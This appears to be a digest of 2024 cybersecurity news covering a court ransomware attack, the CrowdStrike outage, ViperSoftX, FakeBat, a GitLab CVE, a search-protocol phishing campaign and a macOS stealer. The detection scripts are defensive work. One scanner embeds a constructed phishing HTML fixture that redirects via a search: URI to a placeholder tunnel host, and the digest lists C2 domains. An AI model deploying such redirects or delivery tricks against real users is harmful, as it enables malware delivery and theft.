
California's Major Trial Court Falls Victim to Ransomware Attack

The computer systems of the largest trial court in the United States have been hit by ransomware, forcing the court to take them offline. Superior Court officials said they were investigating the incident. As soon as the court learned that its network had been compromised, the systems were disabled, and they were expected to remain down at least through the weekend.

According to the court's statement, a preliminary investigation found no evidence that users' data had been compromised. Officials of the Superior Court of Los Angeles County said the nation's largest trial court was closed on Monday after a ransomware attack shut down its computer systems late last week, taking its library and many other departments offline.

The court became aware of the attack early on Friday morning and disabled its network; the systems remained offline throughout the weekend. The county's 36 courthouses stayed open to the public on Friday, but there were no courthouse operations on Monday. In a statement released on Friday morning, officials said they do not believe the attack is related to the faulty CrowdStrike software update that disrupted airlines, hospitals and governments worldwide on the same day.

Once the court was made aware of the attack, all systems connected to its network were disabled. The court's statement said an initial investigation had revealed no evidence that users' data had been compromised. KCAL, the CNN affiliate in Los Angeles, reported on Monday that the court remained closed as it worked to recover.

The Superior Court of Los Angeles County is the largest unified trial court in the country, serving more than 10 million residents from 36 courthouses. In 2022 it handled nearly 1.2 million case filings and almost 2,200 jury trials. In a statement published on the court's website, Presiding Judge Samantha P. Jessner said: "The Court has been experiencing a cyber-attack which has resulted in almost all of our network systems being shut down."

The statement adds that, following the unprecedented attack on Friday, the court has contained the damage to its network, ensured data integrity and confidentiality, and ensured future network stability and security, and that all 36 courthouses will reopen "tomorrow, July 23" thanks to the tireless dedication of the staff and security experts who assisted in restoring the court to full operation. Court users should expect delays and potential impacts due to limitations in functionality.

Global IT Outage Disrupts Airlines, Hospitals, and Financial Institutions

A major IT outage has affected a wide array of global institutions, including hospitals, major banks, media outlets, and airlines. The disruption has hindered their ability to offer services, causing widespread inconvenience and operational challenges.

International airports across India, Hong Kong, the UK, and the US have reported significant issues, with numerous airlines grounding flights and experiencing delays. In the US, major airlines such as United, Delta, and American Airlines implemented a "global ground stop" on all flights, while Australian carriers Virgin and Jetstar faced delays and cancellations. According to aviation analytics firm Cirium, over 1,000 flights worldwide have been cancelled due to the outages.

At Indira Gandhi International Airport in Delhi, passengers experienced "absolute chaos," with manual processes replacing automated systems. Similar situations were reported in airports in Tokyo, Berlin, Prague, and Zurich, where operations were significantly hampered.

Emergency services and hospitals have also been severely impacted. In the US state of Alaska, officials warned that the 911 system might be unavailable, and some hospitals have had to cancel surgeries. In Australia, however, authorities confirmed that triple-0 call centres were unaffected.

Hospitals in Germany and Israel reported service disruptions, while GP services in the UK were also affected. These interruptions have raised concerns about the ability of medical facilities to provide timely care.

The media sector did not escape the impact, with many broadcast networks in Australia experiencing on-air difficulties. Sky News UK went off air for a period but has since resumed broadcasting. Retail operations were also disrupted, with supermarkets like Coles in Australia facing payment system failures, forcing the closure of self-checkout tills.

Cybersecurity firm CrowdStrike has confirmed that a defective update to its software on Microsoft Windows hosts caused the outage. In a statement, CrowdStrike said the issue had been identified and isolated and a fix deployed, and emphasised that the incident was not a cyberattack. CrowdStrike advised organisations to communicate with its representatives through official channels to ensure proper coordination.

Earlier in the day, a Microsoft 365 service update had noted an issue impacting users' ability to access various Microsoft 365 apps and services. Microsoft later reported that most services were restored within a few hours.

The outage has highlighted the fragility of global IT systems and the widespread reliance on third-party software running with deep privileges on critical hosts. A spokesperson for Australia's home affairs ministry attributed the issues to a technical problem with a third-party software platform used by the affected companies. The country's cybersecurity watchdog confirmed that there was no evidence of a malicious attack.

As companies scramble to resolve the issues, the incident serves as a stark reminder of the critical need for robust IT infrastructure and effective crisis management strategies. The global scale of the disruption underscores the interconnected nature of modern technology and the potential for widespread impact when systems fail.

This incident will likely prompt a reevaluation of cybersecurity measures and disaster recovery plans across various sectors, emphasising the importance of resilience and preparedness in the digital age.


Improved ViperSoftX Malware Distributed Through eBooks

Researchers have found that the ViperSoftX information stealer, first discovered in 2020, has become more sophisticated and now uses advanced techniques to avoid detection. One of its new methods is using the Common Language Runtime (CLR) to run PowerShell commands from within AutoIt scripts, which are spread through pirated eBooks. Because the PowerShell runs inside a process that looks like routine automation, the activity blends into normal system behaviour and is harder for security software to detect.

How ViperSoftX Spreads

ViperSoftX spreads through torrent sites by posing as eBooks. The infection starts when a user downloads a RAR archive containing a hidden folder, a deceptive shortcut (LNK) file that looks like a harmless PDF or eBook, and a PowerShell script. The archive also contains AutoIt.exe and AutoIt script files disguised as ordinary JPG image files. When the user clicks the shortcut, it sets off a chain of commands that begins by reading the contents of "zz1Cover4.jpg". The commands are padded with whitespace so they are hidden from view, and are executed by PowerShell to perform the malicious actions described below.

What the Malware Does

According to researchers from Trellix, the PowerShell code performs several tasks: it unhides the hidden folder, calculates the total size of all disk drives, and creates a Windows Task Scheduler entry that runs AutoIt3.exe every five minutes after the user logs in, which keeps the malware active on the infected system. It also copies two files into the %APPDATA%\Microsoft\Windows directory, renaming them to a .au3 script and AutoIt3.exe.

A notable aspect of ViperSoftX is its use of the CLR to run PowerShell from within AutoIt, a tool that security software normally trusts for automating Windows tasks. Because the PowerShell runs inside the AutoIt process rather than as a separate powershell.exe process, the activity escapes detections that key on PowerShell itself. ViperSoftX also uses heavy obfuscation, including Base64 encoding and AES encryption, to hide the commands in the PowerShell scripts extracted from the image decoy files, which makes it difficult for researchers and analysis tools to work out what the malware does.

Additionally, ViperSoftX attempts to modify the Antimalware Scan Interface (AMSI) to bypass security checks. By reusing existing bypass scripts rather than writing their own, the malware developers can focus their effort on improving evasion.

The malware's network activity shows it tries to blend its traffic with legitimate system activity. Researchers noticed it uses deceptive hostnames, like security-microsoft[.]com, to appear more trustworthy and trick victims into thinking the traffic is from Microsoft. Analysis of a Base64-encoded User-Agent string revealed detailed system information gathered from infected systems, such as disk volume serial numbers, computer names, usernames, operating system versions, antivirus product information, and cryptocurrency details.
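Two of the behaviours described above are easy to hunt for: the persistence task that runs AutoIt3.exe from %APPDATA%\Microsoft\Windows every five minutes, and the Base64-encoded User-Agent that carries the host profile to a look-alike Microsoft domain. The following Python is an added example written for this page, not Trellix's code or a sample of the malware. The scheduled-task export format, the proxy log layout and the field order inside the decoded profile string are all constructed assumptions for the demo; the detection logic itself is what a practitioner would run over real exports.

```python
import base64
import binascii
import re
import urllib.parse

# --- 1. Scheduled-task hunt -------------------------------------------------
# Constructed sample of exported scheduled tasks (hypothetical export format:
# name, command, arguments, repetition interval in minutes). Not real telemetry.
SAMPLE_TASKS = [
    {"name": "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start",
     "command": r"C:\Windows\System32\svchost.exe", "arguments": "-k netsvcs", "interval_min": 0},
    {"name": "\\OneDrive Standalone Update Task",
     "command": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe",
     "arguments": "", "interval_min": 1440},
    {"name": "\\Updater",
     "command": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\AutoIt3.exe",
     "arguments": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\zz1Cover4.au3", "interval_min": 5},
]

# %APPDATA% expands to ...\AppData\Roaming; the article names %APPDATA%\Microsoft\Windows as the drop folder.
APPDATA_DROP = re.compile(r"\\AppData\\Roaming\\Microsoft\\Windows\\", re.IGNORECASE)

def suspicious_tasks(tasks):
    """Names of tasks that run AutoIt3.exe from the drop folder, from a .au3 script, or every few minutes."""
    hits = []
    for t in tasks:
        cmd, args = t.get("command", ""), t.get("arguments", "")
        if not cmd.lower().endswith("autoit3.exe"):
            continue
        in_drop = bool(APPDATA_DROP.search(cmd) or APPDATA_DROP.search(args))
        tight_loop = 0 < t.get("interval_min", 0) <= 5
        if in_drop or tight_loop or args.lower().endswith(".au3"):
            hits.append(t["name"])
    return hits

# --- 2. Beacon User-Agent decoding --------------------------------------------
# Constructed profile string; the field layout (volume serial | computer | user | OS | AV | wallet)
# is an assumption for the demo, not the stealer's real format.
_PROFILE = "1A2B-3C4D|DESKTOP-7F3K2Q|alice|Windows 10 Pro|Windows Defender|wallet:MetaMask"
_BEACON_UA = base64.b64encode(_PROFILE.encode()).decode()

# Constructed proxy log: timestamp, client IP, method, URL, status, quoted User-Agent.
SAMPLE_PROXY_LOG = f'''\
2024-07-10T09:12:01Z 10.0.0.15 GET https://www.microsoft.com/en-us/ 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2024-07-10T09:12:44Z 10.0.0.15 POST https://security-microsoft.com/api/v1/ 200 "{_BEACON_UA}"
2024-07-10T09:13:05Z 10.0.0.22 GET https://login.microsoft.com/common/oauth2/ 302 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
'''

LOG_RE = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d+) "(?P<ua>.*)"$')

def decode_beacon_ua(ua):
    """Return the decoded text if the User-Agent is a Base64 blob of delimited printable text, else None."""
    try:
        text = base64.b64decode(ua, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None   # real browser UAs contain spaces and parentheses, so they never pass strict decoding
    return text if text.isprintable() and text.count("|") >= 3 else None

def lookalike_host(host):
    """Brand-bearing hostnames that are not actually under microsoft.com, e.g. security-microsoft.com."""
    return "microsoft" in host and host != "microsoft.com" and not host.endswith(".microsoft.com")

def scan_proxy_log(log_text):
    """Flag requests whose User-Agent decodes to a host profile or whose host imitates Microsoft."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        host = urllib.parse.urlsplit(m["url"]).hostname or ""
        profile = decode_beacon_ua(m["ua"])
        if profile or lookalike_host(host):
            findings.append({"src": m["src"], "host": host, "profile": profile})
    return findings

if __name__ == "__main__":
    print("suspicious tasks:", suspicious_tasks(SAMPLE_TASKS))
    for f in scan_proxy_log(SAMPLE_PROXY_LOG):
        print("beacon:", f)
```

The strict `validate=True` decode is the point of the second check: a genuine browser User-Agent can never be a clean Base64 string, so anything that decodes to printable, delimited text is worth a closer look regardless of which host it went to.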

Researchers warn that ViperSoftX is becoming more dangerous. Its ability to perform malicious actions while avoiding traditional security measures makes it a serious threat. As ViperSoftX continues to evolve, it's essential for users to stay alert and use strong security practices to protect their systems from such advanced threats.


Exploring Fake-Bat Loaders: Distribution Tactics and Cybercrime Networks

Threats that rely on the drive-by-download technique increased significantly during the first half of 2024, among them the FakeBat loader (formerly EugenLoader or PaykLoader). Cybercriminals have leaned on this method for several years to infect unsuspecting users while they browse the web. 

A drive-by download uses SEO poisoning, malvertising and malicious code injected into compromised websites to push a download. Users are tricked into installing fake software or fake browser updates, and in doing so unwittingly install malware. Multiple intrusion sets use the technique to distribute loaders (such as FakeBat, BatLoader), botnets (such as IcedID, PikaBot), information stealers (such as Vidar, Lumma, Redline), post-exploitation frameworks (such as Cobalt Strike, Sliver) and remote-access and reconnaissance tools (such as NetSupport), among many others.

Some of these attacks have been conducted by Initial Access Brokers (IABs) and have led to ransomware deployments (BlackCat, Royal) in several networks. In the first half of 2024, FakeBat (also known as EugenLoader, PaykLoader) was one of the most widely used drive-by-download loaders. It is built to download and execute later-stage payloads such as IcedID, Lumma, Redline, SmokeLoader, SectopRAT and Ursnif. Sekoia's Threat Detection & Research (TDR) team uncovered numerous FakeBat distribution campaigns in 2024 through its ongoing research. 

These campaigns commonly rely on malvertising that leads to landing pages impersonating legitimate software, on fake web browser update prompts planted on compromised websites, and on social engineering through social networking sites. The TDR team tracked FakeBat's C2 infrastructure to learn when new C2 servers were added and when the operation changed. Sekoia's FLINT report on FakeBat presents the operators' activity on cybercrime forums, analyses campaigns that distributed FakeBat in previously undocumented ways, provides technical details of its distribution campaigns, and describes the related C2 infrastructure. 

The TDR analysts also share indicators of compromise (IoCs), YARA rules and heuristics for detecting and tracking FakeBat distribution and C2 infrastructure. On the Exploit forum, the threat actor Eugenfest (aka Payk_34) has been selling FakeBat as a Loader-as-a-Service since at least December 2022. According to the seller's advertisement, FakeBat is a loader packaged in MSI format with "several anti-detection features, such as bypassing Google's Unwanted Software Policy and Windows Defender's alerts and being protected from VirusTotal detection". 

The FakeBat Malware-as-a-Service (MaaS) provides its customers with tooling to trojanize legitimate software so that victims execute the malicious code without realising it. The service includes an administration panel with detailed information about each infected host: IP address, geographic location, operating system, web browser, the software the installer impersonated, and installation status. 

Clients can also attach comments to each bot entry to help manage their operations. September 2023 marked a significant expansion for the FakeBat operators, who launched an aggressive advertising campaign across cybercrime forums and Telegram channels and introduced MSIX as a new packaging format for their builds. To get past Microsoft SmartScreen, the operators began signing the FakeBat installer with a legitimate code-signing certificate. Signing is standard for the MSIX builds and optional for the MSI builds, and it lends the installer a veneer of legitimacy that helps it evade both the user's suspicion and reputation-based checks. 

FakeBat remained one of the most widely used loaders in 2024 thanks to a diverse array of distribution methods, including sites masquerading as legitimate software vendors and compromised web domains injected with malicious code. Sekoia has identified several domains associated with FakeBat's command-and-control (C2) infrastructure, such as 0212top[.]online, 3010cars[.]top and 756-ads-info[.]site, frequently registered with obscured or misleading ownership details. The malware also spreads through fake software update campaigns. 

Sekoia's investigations have uncovered instances where FakeBat mimicked updates for popular applications such as AnyDesk and Google Chrome, leading users to download malware under the guise of legitimate updates. These drive-by campaigns rely on social engineering rather than software exploits: the user is persuaded to download and run the installer themselves. In conclusion, FakeBat's broad distribution strategies and continual evolution highlight its prominence in the cybercrime ecosystem and the persistent challenge it poses for defenders.

Pipeline Hijacking: GitLab’s Security Wake-Up Call

A critical vulnerability in some versions of GitLab Community Edition (CE) and Enterprise Edition (EE) could be exploited to run CI/CD pipelines as any user.

GitLab is a prominent web-based open-source software project management and task tracking tool. There are an estimated one million active license users.

Understanding the Critical GitLab Vulnerability: CVE-2024-5655

The security problem resolved in the latest update is tracked as CVE-2024-5655 and carries a CVSS score of 9.6 out of 10. Under conditions the vendor did not specify, an attacker could exploit it to execute a pipeline as another user.

GitLab pipelines are a component of the Continuous Integration/Continuous Deployment (CI/CD) system that allows users to build, test, and deploy code changes by running processes and tasks automatically, either in parallel or sequentially.

The vulnerability affects GitLab CE/EE versions 15.8 through 16.11.4, 17.0.0 through 17.0.2, and 17.1.0.

GitLab has resolved the vulnerability by releasing versions 17.1.1, 17.0.3, and 16.11.5, and users are encouraged to install the patches as soon as possible.

What Is CVE-2024-5655?

The vulnerability allows an attacker to trigger a pipeline as any user within the GitLab environment. In other words, an unauthorized individual can execute code within a project’s pipeline, even if they don’t have the necessary permissions. This could lead to several serious consequences:

Unauthorized Access to Sensitive Code: An attacker could gain access to private repositories and sensitive code by exploiting this vulnerability, compromising the confidentiality of intellectual property, proprietary algorithms, and other valuable assets stored in GitLab.

Data Leakage: The ability to run pipelines as any user means that an attacker can potentially leak data, including credentials, API keys, and configuration files. This information leakage could have severe implications for an organization’s security posture.

Malicious Code Execution: An attacker could inject malicious code into pipelines, leading to unintended actions. For instance, they might introduce backdoors, modify code, or execute arbitrary commands.

Affected Versions

The vulnerability impacts specific versions of GitLab:

  • GitLab versions starting from 15.8 prior to 16.11.5
  • GitLab versions starting from 17.0 prior to 17.0.3
  • GitLab versions starting from 17.1 prior to 17.1.1

GitLab's response 

GitLab addressed the issue in the patched releases listed above. The recommended actions are:

Upgrade GitLab: Update your GitLab installation to a patched version. GitLab has provided patches for the affected releases, so ensure you apply them promptly.

Review Permissions: Audit user permissions within your GitLab projects. Limit pipeline execution rights to authorized users only.

Monitor Pipelines: Keep an eye on pipeline activity. Unusual or unexpected pipeline runs should be investigated promptly.
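The three actions above translate into two checks an administrator can script: is this instance inside an affected range, and have any pipelines on protected refs been triggered by identities that should not be running them. The Python below is an added example for this page, not GitLab's own tooling. The version ranges are taken from the advisory as listed above; the pipeline records are constructed in the shape of the single-pipeline REST endpoint (GET /projects/:id/pipelines/:pipeline_id, which includes the triggering `user`), and the allowed-user and protected-ref sets are assumptions you would replace with your project's actual policy.

```python
import re

# Affected ranges from the advisory for CVE-2024-5655: each entry is [first affected, first fixed).
AFFECTED_RANGES = [
    ((15, 8, 0), (16, 11, 5)),
    ((17, 0, 0), (17, 0, 3)),
    ((17, 1, 0), (17, 1, 1)),
]

def parse_version(text):
    """'16.11.4-ee' -> (16, 11, 4); the edition suffix is ignored."""
    m = re.match(r"^v?(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised GitLab version: {text!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))

def is_vulnerable(version):
    """True if this GitLab CE/EE version falls inside an affected range for CVE-2024-5655."""
    v = parse_version(version)
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)

# Constructed pipeline records in the shape of GET /projects/:id/pipelines/:pipeline_id; not real data.
SAMPLE_PIPELINES = [
    {"id": 101, "ref": "main", "source": "push", "status": "success", "user": {"username": "alice"}},
    {"id": 102, "ref": "feature/login", "source": "push", "status": "success", "user": {"username": "bob"}},
    {"id": 103, "ref": "main", "source": "api", "status": "running", "user": {"username": "bob"}},
    {"id": 104, "ref": "release/2.0", "source": "web", "status": "success", "user": {"username": "ci-bot"}},
]

def unexpected_pipelines(pipelines, allowed_users, protected_refs):
    """Pipelines on a protected ref whose triggering user is outside the approved set.

    A pipeline executed 'as another user' shows up as an identity appearing on a ref
    that identity does not normally touch, so the audit keys on ref plus user."""
    findings = []
    for p in pipelines:
        user = (p.get("user") or {}).get("username", "<none>")
        if p["ref"] in protected_refs and user not in allowed_users:
            findings.append({"id": p["id"], "ref": p["ref"], "user": user, "source": p.get("source")})
    return findings

if __name__ == "__main__":
    for v in ["16.11.4", "16.11.5", "17.0.2", "17.1.0-ee", "17.1.1"]:
        print(v, "vulnerable" if is_vulnerable(v) else "patched")
    print(unexpected_pipelines(SAMPLE_PIPELINES, {"alice", "ci-bot"}, {"main", "release/2.0"}))
```

Feed `is_vulnerable()` the string from your instance's /api/v4/version endpoint, and run `unexpected_pipelines()` over the pipelines pulled for each sensitive project; pipeline 103 above is the kind of record worth investigating, since `bob` is not expected to run anything on `main`.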

New Malware Campaign Exploits Windows Search to Spread

A new and intricate malware campaign discovered by Trustwave SpiderLabs abuses the Windows search feature from within HTML code to deliver malicious files. The attack begins with a phishing email carrying an HTML attachment disguised as a routine document, such as an invoice. To deceive users and evade email security scanners, the HTML file is compressed inside a ZIP archive. This extra layer reduces the file size, gets the attachment past some email scanners that do not inspect archive contents, and adds an extra step for the user that simpler security measures may not follow. Notably, this campaign has been observed in limited instances so far.


HTML Attachment Mechanics

Once the HTML attachment is opened, it abuses a standard HTML feature to reach a Windows URI handler. The critical component is a `<meta http-equiv="refresh">` tag whose content attribute carries a zero-second delay and a target URL, so the browser redirects immediately and the user sees nothing happen. An anchor tag with the same URL serves as a fallback, so the user is still exposed if the automatic redirect is blocked.


Exploitation of the Search Protocol

The redirection URL uses the `search:` protocol, a URI scheme that lets a web page hand a query to Windows Explorer's search function; when the HTML file loads, browsers typically prompt the user before allowing the hand-off. The attackers use this protocol to open Windows Explorer with parameters they crafted: the query looks for items labelled "INVOICE", the search scope is pinned to a specific remote location exposed through Cloudflare's tunnelling service, and the display name of the search window is set to "Downloads" so it looks like a local folder.


Execution of Malicious Files

After the user permits the search action, Windows Explorer lists files named "invoice" from the remote server. Only one item, a shortcut (LNK) file, appears in the results. The LNK file points to a batch script (BAT) hosted on the same server, and clicking it would trigger the next stage. At the time of analysis the BAT payload could not be retrieved because the server was down, but the chain shows a careful understanding of both a legitimate Windows feature and user behaviour; no software vulnerability is exploited.
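A mail gateway or analyst can catch this attachment before a user ever sees the prompt by unpacking the ZIP, parsing the HTML, and pulling apart any `search:` or `search-ms:` URI it redirects to. The following Python is an added example written for this page, not Trustwave's code or the campaign's actual HTML. The sample attachment is constructed to match the description above (instant meta refresh plus anchor fallback, an "INVOICE" query, a "Downloads" display name, and a crumb pointing at a tunnel hostname); the hostname and share name are placeholders.

```python
import io
import re
import zipfile
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed HTML attachment modelled on the campaign's description. The tunnel hostname
# and share name are placeholders, not indicators from the real campaign.
SAMPLE_HTML = r"""<html><head><meta http-equiv="refresh"
content="0; url=search:query=INVOICE&crumb=location:\\example-tunnel.trycloudflare.com@SSL\share&displayname=Downloads">
</head><body><p>Your invoice is attached.</p>
<a href="search:query=INVOICE&crumb=location:\\example-tunnel.trycloudflare.com@SSL\share&displayname=Downloads">Open invoice</a>
</body></html>"""

SEARCH_SCHEMES = {"search", "search-ms"}

class SearchUriExtractor(HTMLParser):
    """Collects every URI reachable through a meta refresh or an anchor href."""
    def __init__(self):
        super().__init__()
        self.uris = []          # (how, uri, refresh_delay)

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            delay, _, rest = a.get("content", "").partition(";")   # "0; url=..." -> delay "0"
            m = re.search(r"url\s*=\s*(.+)", rest, re.IGNORECASE)
            if m:
                self.uris.append(("meta-refresh", m.group(1).strip().strip("'\""), delay.strip()))
        elif tag == "a" and a.get("href"):
            self.uris.append(("anchor", a["href"].strip(), None))

def parse_search_uri(uri):
    """Break a search:/search-ms: URI into its parameters and pull out the remote share host."""
    scheme, sep, rest = uri.partition(":")
    if not sep or scheme.lower() not in SEARCH_SCHEMES:
        return None
    params = {}
    for part in rest.split("&"):
        key, _, value = part.partition("=")
        params[key.lower()] = unquote(value)
    # crumb=location:\\host@SSL\share makes Explorer browse a remote WebDAV share
    m = re.match(r"location:\\\\([^\\@]+)", params.get("crumb", ""), re.IGNORECASE)
    return {
        "scheme": scheme.lower(),
        "query": params.get("query"),
        "displayname": params.get("displayname"),
        "remote_host": m.group(1) if m else None,
    }

def analyze_html_attachment(html_text):
    """Return one finding per search-protocol URI in the HTML, tagged with how it is triggered."""
    extractor = SearchUriExtractor()
    extractor.feed(html_text)
    extractor.close()
    findings = []
    for how, uri, delay in extractor.uris:
        info = parse_search_uri(uri)
        if info:
            info.update(via=how, delay=delay)
            findings.append(info)
    return findings

def scan_zip_attachment(zip_bytes):
    """Unpack the ZIP the way a mail gateway would and analyse every HTML file inside."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if name.lower().endswith((".htm", ".html")):
                results[name] = analyze_html_attachment(zf.read(name).decode("utf-8", "replace"))
    return results

def build_sample_zip():
    """Constructed ZIP wrapping the sample HTML, mirroring the phishing attachment layout."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("INVOICE_20240611.html", SAMPLE_HTML)
    return buf.getvalue()

if __name__ == "__main__":
    for name, findings in scan_zip_attachment(build_sample_zip()).items():
        for f in findings:
            print(name, f)
```

Anything this returns is a block-worthy verdict on its own: a benign invoice has no reason to redirect a browser into Windows Explorer, and the `remote_host` field gives you the tunnel hostname to pivot on in proxy and DNS logs.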

To prevent abuse of the `search-ms` and `search` URI protocols, one mitigation is to remove the protocol handlers by deleting their registry keys, HKEY_CLASSES_ROOT\search-ms and HKEY_CLASSES_ROOT\search (for example with `reg delete HKEY_CLASSES_ROOT\search-ms /f`). Export the keys first so the change can be reverted, since removing them also disables legitimate uses of the search protocol.

This attack underscores the importance of user awareness and proactive security strategies. It does not install malware automatically; it depends on the user following a sequence of prompts and clicks while the attackers' true intent is carefully obscured. As the threat landscape becomes more complex, continuous education and robust security measures are vital to protect against such deceptive tactics.

Trustwave SpiderLabs has updated its MailMarshal software to detect and block HTML files that abuse the search URI handler, offering additional protection for users.


New MacOS Malware Steals Browser Data and Cryptocurrency

While malware attacks on Windows and Android systems are more frequent, macOS is not immune to such dangers. Cybersecurity experts at Moonlock Lab have identified a new type of macOS malware that adeptly avoids detection and poses a serious threat to user data and cryptocurrency.


How the Malware Spreads

The infection starts when users visit websites that offer pirated software. On these sites, they might download a file called CleanMyMacCrack.dmg, thinking it’s a cracked version of the CleanMyMac utility. However, launching this DMG file triggers a Mach-O executable, which then downloads an AppleScript. This script is specifically designed to steal sensitive information from the infected Mac.


Malware Capabilities

Once the malware infiltrates a macOS system, it can carry out a range of malicious activities:

  • It captures and stores the Mac user's username.
  • The malware sets up temporary directories to hold the stolen information.
  • It retrieves browsing history, cookies, saved passwords and other data from several web browsers.
  • The malware identifies and accesses directories containing cryptocurrency wallets.
  • It copies data from the macOS keychain, Apple Notes and Safari cookies.
  • It gathers general user information, system specifications and metadata.
  • All the collected data is eventually exfiltrated to the attackers.


Link to a Known Hacker

Moonlock Lab has traced this macOS malware back to a notorious Russian-speaking hacker known as Rodrigo4. This individual has been seen on the XSS underground forum, where he is actively seeking collaborators to help spread his malware through search engine optimization (SEO) manipulation and online advertisements.

Rodrigo4's method involves manipulating search engine results and placing ads to lure unsuspecting users into downloading the malicious software. By making the malware appear as a popular utility, he increases the chances of users downloading and installing it, unknowingly compromising their systems.


How to Protect Yourself

To prevent this malware from infecting your Mac, Moonlock Lab recommends several precautions:

1. Only download software from reputable and trusted sources.

2. Regularly update your operating system and all installed applications.

3. Use reliable security software to detect and block malware.

The crucial point is that users should be cautious about downloading software from unverified websites and should avoid pirated software altogether, as these are common vectors for malware distribution. Staying informed about the latest threats and adopting good digital hygiene can also drastically reduce the risk of infection.




Why CVEs Reflect an Incentives Problem

Two decades ago, economist Steven Levitt and New York Times reporter Stephen Dubner published "Freakonomics," a book that applied economic principles to various social phenomena. They argued that understanding how people make decisions requires examining the incentives they respond to. Using a range of sociological examples, they demonstrated how incentives can lead to unexpected and sometimes counterproductive outcomes.

Reflecting on these unintended consequences brings to mind a growing issue in cybersecurity: the rapid increase in software vulnerabilities tracked as Common Vulnerabilities and Exposures (CVEs). Last year, a record 28,902 CVEs were published, averaging nearly 80 vulnerabilities per day—a 15% rise from 2022. 

These software flaws are costly, with two-thirds of security organizations reporting an average backlog of over 100,000 vulnerabilities and patching fewer than half. The surge in CVEs is partly because we’ve improved at discovering vulnerabilities, and partly due to inadequate safeguards in the creation and tracking mechanisms for CVEs. It’s crucial to consider the incentive structure that motivates the identification and assignment of vulnerabilities.

While the system for assigning and scoring CVEs is widely used, it has significant flaws. Established by MITRE in 1999, the CVE system provides a standardized method for identifying and cataloguing software vulnerabilities, helping organizations prioritize and mitigate them. However, the incentive mechanisms behind CVE assignment and scoring present challenges that can undermine this system’s effectiveness.

Some security researchers seek a reputation within the cybersecurity community by gaming the CVE system. This drive for recognition or professional advancement can result in a focus on the quantity over quality of submissions, cluttering the system with trivial or noncritical issues and diverting attention from more severe vulnerabilities. The ability to file CVEs anonymously or with minimal evidence also introduces opacity, allowing for erroneous, exaggerated, or malicious submissions. This lack of accountability necessitates rigorous verification processes to maintain trust in the system.

The Common Vulnerability Scoring System (CVSS) has been criticized for not accurately reflecting the actual risk posed by vulnerabilities in real-world environments. High-scoring vulnerabilities may receive undue attention, while more critical, exploitable flaws in specific contexts are deprioritized. For instance, security researcher Dan Lorenc highlighted a day when 138 CVEs were published, two with a critical priority score of 9.8, but none were true vulnerabilities. This raises the question: Are we seeing more CVEs because there are more vulnerabilities, or because the rewards for reporting them have increased?

To address these issues, we need to rethink the incentive structure of CVE reporting. Here are some suggestions:

1. Reward quality over quantity: Implement rewards based on the quality and impact of reported vulnerabilities, encouraging researchers to focus on significant exploits rather than sheer numbers.

2. Enhance verification and accountability: Introduce a tiered verification process requiring substantial proof of a vulnerability’s existence and impact before assigning a CVE, while still protecting researchers' identities.

3. Redefine CVSS to reflect real-world risk: Revamp the CVSS to better indicate real-world risk and exploitability, possibly incorporating feedback from organizations that have experienced exploit attempts.

Incentives play a crucial role in motivating the discovery and disclosure of vulnerabilities. To address the current issues in CVE reporting, we must reconsider how incentives shape behaviour. Until then, we can expect another record-breaking year for CVEs.

IBM's Exit from Cybersecurity Software Shakes the Industry

In an unexpected move that has disrupted the cybersecurity equilibrium, IBM has announced its exit from the cybersecurity software market by selling its QRadar SaaS portfolio to Palo Alto Networks. This development has left many Chief Information Security Officers (CISOs) rethinking their procurement strategies and vendor relationships as they work to rebuild their Security Operations Centers (SOCs).

IBM's QRadar Suite: A Brief Overview

The QRadar Suite, rolled out by IBM in 2023, included a comprehensive set of cloud-native security tools such as endpoint detection and response (EDR), extended detection and response (XDR), managed detection and response (MDR), and key components for log management, including security information and event management (SIEM) and security orchestration, automation, and response (SOAR) platforms. The suite was recently expanded to include on-premises versions based on Red Hat OpenShift, with plans for integrating AI capabilities through IBM's Watsonx AI platform.

The agreement, expected to close by the end of September, also designates IBM Consulting as a "preferred managed security services provider (MSSP)" for Palo Alto Networks customers. This partnership will see the two companies sharing a joint SOC, potentially benefiting customers looking for integrated security solutions.

Palo Alto Networks has assured that feature updates and critical fixes will continue for on-premises QRadar installations. However, the long-term support for these on-premises solutions remains uncertain.

Customer Impact and Reactions

The sudden divestiture has taken the cybersecurity community by surprise, particularly given IBM's significant investment in transforming QRadar into a cloud-native platform. Eric Parizo, managing principal analyst at Omdia, noted the unexpected nature of this move, highlighting the substantial resources IBM had dedicated to QRadar's development.

Customers now face a critical decision: migrate to Palo Alto's Cortex XSIAM platform or explore other alternatives. Omdia's research indicates that IBM's QRadar was the third-largest next-generation SIEM provider, trailing only Microsoft and Splunk (now part of Cisco). The sudden shift has left many customers seeking clarity and solutions.

Market Dynamics

This acquisition comes at a pivotal time in the cybersecurity industry, with SIEM, SOAR, and XDR technologies increasingly converging into unified SOC platforms. Major players like AWS, Microsoft, Google, CrowdStrike, Cisco, and Palo Alto Networks are leading this trend. Just before IBM's announcement, Exabeam and LogRhythm revealed their merger plans, aiming to combine their SIEM and user and entity behaviour analytics (UEBA) capabilities.

Forrester principal analyst Allie Mellen pointed out that IBM's QRadar lacked a fully-fledged XDR offering, focusing more on EDR. This gap might have influenced IBM's decision to divest QRadar.

